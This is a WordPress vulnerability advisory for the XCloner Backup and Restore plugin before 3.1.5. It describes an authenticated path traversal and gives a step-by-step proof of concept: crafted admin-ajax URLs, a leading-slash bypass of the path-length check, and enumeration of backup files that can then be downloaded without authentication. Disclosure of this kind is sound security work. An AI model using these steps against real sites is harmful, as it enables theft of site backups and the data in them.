WordPress Plugin Vulnerabilities
XCloner - Backup and Restore < 3.1.5 - Authenticated Path Traversal
Description
Authenticated users are able to perform directory listings at any location available to the Wordpress user, leaking filenames of previous backups. This was found in XCloner - Backup and Restore version 3.1.4, but may have been introduced in earlier versions. Attackers can leverage directory listings to leak otherwise secret filepaths to previous backups, allowing them to acquire full backup contents, since the backup download is not authenticated.
Proof of Concept
Log in as a regular, unprivileged user (subscriber): 1. Visit http://wordpress/wp-admin/admin-ajax.php?action=files_xml. This is a XML file-listing of the root Wordpress installation, and its fullpath. 2. Add a `dir` GET argument to the URL to browse to a specific directory. The length of this path has to be longer than the length of the `backup_path` configuration variable on the server, but this is bypassable by adding leading slashes to your path. ie: /foo/bar → /////////foo/bar, or until the length of your path exceeds the configuration one, using trial and error. In this case, we want to leak previous backups, so navigate to http://wordpress/wp-admin/admin-ajax.php?action=files_xml&dir=///////var/www/html/administrator/backups 3. Backups will be enumerated here, you can then browse to their location Depending on previous steps, the URL would be something like this: http://wordpress/administrator/backups/{BACKUP_FILENAME}
Affects Plugins
References
Miscellaneous
Submitter
ldionmarcil
Submitter website
Submitter twitter
Verified
No
WPVDB ID
Timeline
Publicly Published
2016-12-31 (about 6 years ago)
Added
2017-01-03 (about 6 years ago)
Last Updated
2020-09-25 (about 3 years ago)